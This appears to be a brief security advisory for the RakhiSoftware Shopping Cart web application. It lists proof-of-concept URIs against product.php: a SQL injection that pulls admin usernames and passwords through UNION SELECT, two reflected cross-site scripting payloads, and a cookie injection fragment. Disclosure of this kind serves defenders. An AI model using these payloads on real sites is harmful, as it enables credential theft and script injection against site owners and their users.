|
RakhiSoftware Shopping Cart Multiple Remote Vulnerabilities
Attackers can exploit the issues via a browser. To exploit the cross-site scripting issues, an attacker must entice an unsuspecting user to follow a malicious URI. The following example URIs and proof of concept are available: http://www.example.com/rjbike_new/product.php?category_id=1+union%20select%20 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21%20from%20admin--&subcategory_id=1 http://www.example.com/rjbike_new/product.php?category_id=>'><script>alert(19 49308870);</script>&subcategory_id=1 http://www.example.com/rjbike_new/product.php?category_id=1&subcategory_id=>' ><script>alert(1949308870);</script> Set Cookie: PHPSESSID=' |
|
Privacy Statement |